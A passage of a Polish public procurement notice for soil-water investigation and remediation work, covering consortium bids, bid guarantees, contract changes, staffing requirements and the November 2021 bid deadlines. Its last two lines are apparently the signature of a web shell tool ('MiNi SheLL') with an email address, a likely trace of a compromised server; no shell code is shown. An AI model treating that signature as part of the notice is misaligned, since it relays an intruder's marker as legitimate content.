upływu terminu związania ofertą lub złożył wniosek o zwrot wadium <br/>w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp.<br/>14. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określają przepisy ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa powyżej wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie z którego wynika, które usługi wykonają poszczególni wykonawcy (załącznik nr 7 do SWZ).<br/>Oświadczenie o niepodleganiu wykluczeniu – wzór oświadczenia <br/>stanowi załącznik nr 2 do SWZ oraz oświadczenie o spełnieniu warunków udziału w postępowaniu – wzór oświadczenia stanowi załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie o niepodleganiu wykluczeniu oraz oświadczenie o spełnieniu warunków udziału w postepowaniu składa każdy z wykonawców<br/>W przypadku wnoszenia wadium w formie gwarancji lub poręczenia przez wykonawców wspólnie ubiegających się o zamówienie (konsorcjum) zamawiający uzna prawidłowość tych dokumentów jako zabezpieczenia oferty jeżeli:<br/>1)	w dokumencie gwarancji lub poręczenia jako wykonawcę (zobowiązanego) wskaże się wszystkie podmioty należące do konsorcjum lub<br/>2)	w dokumencie gwarancji lub poręczenia zawrze się informację, że przez wykonawcę (zobowiązanego) należy rozumieć nie tylko podmiot oznaczony <br/>w dokumencie gwarancji/poręczenia, ale i wszystkich wykonawców z którymi zdecydował się on złożyć ofertę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z Rozdziałem XXXIV oraz mając na względzie art. 455 ust. 1 pkt 1) dopuszcza możliwość dokonania zmian postanowień zawartej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-23 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej platformazakupowa.pl/pn/rzi_gdynia przed upływem terminu wyznaczonego na składanie ofert</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Zamawiający stawia wymóg zatrudnienia na umowę o pracę przez wykonawcę <br/>lub podwykonawcę osób wykonujących następujące czynności w trakcie realizacji zamówienia tj. minimum: <br/>-jednej osoby do opracowania projektu rozpoznania środowiska gruntowo – wodnego oraz dokumentacji wynikowej rozpoznania środowiska, <br/>-	jednej osoby do prac monitoringu w zakresie koordynowania poboru prób, <br/>analizy wyników i sprawozdawczości, <br/>-jednej osoby do opracowania projektu planu remediacji.<br/>2. Terminy realizacji poszczególnych etapów umowy przedstawiono w Harmonogramie i zakresie wykonania zleconych prac załącznik nr 12 do SWZ i Harmonogramie rzeczowym realizacji prac załącznik nr 13 do SWZ.<br/>3.Wykonawca może w celu potwierdzenia spełnienia warunków, o których mowa <br/>w rozdziale XVIII ust. 1 pkt 2) SWZ w stosownych sytuacjach <br/>oraz w odniesieniu do konkretnego zamówienia lub jego części polegać <br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej <br/>lub ekonomicznej innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów <br/>na potrzeby realizacji zamówienia zgodnie z treścią załącznika nr 6 do SWZ <br/>lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienia, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>5.Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu w formie elektronicznej opatrzone kwalifikowanym podpisem elektronicznym <br/>lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym.<br/>6.	Do przygotowania oferty zaleca się wykorzystanie Formularza oferty, którego wzór stanowi załącznik nr 1 do SWZ. W przypadku, gdy wykonawca nie korzysta <br/>z przygotowanego przez zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w Formularzu Oferty.<br/>7.Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany będzie przed zawarciem umowy do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej podanej <br/>w ofercie.

Creat By MiNi SheLL
Email: jattceo@gmail.com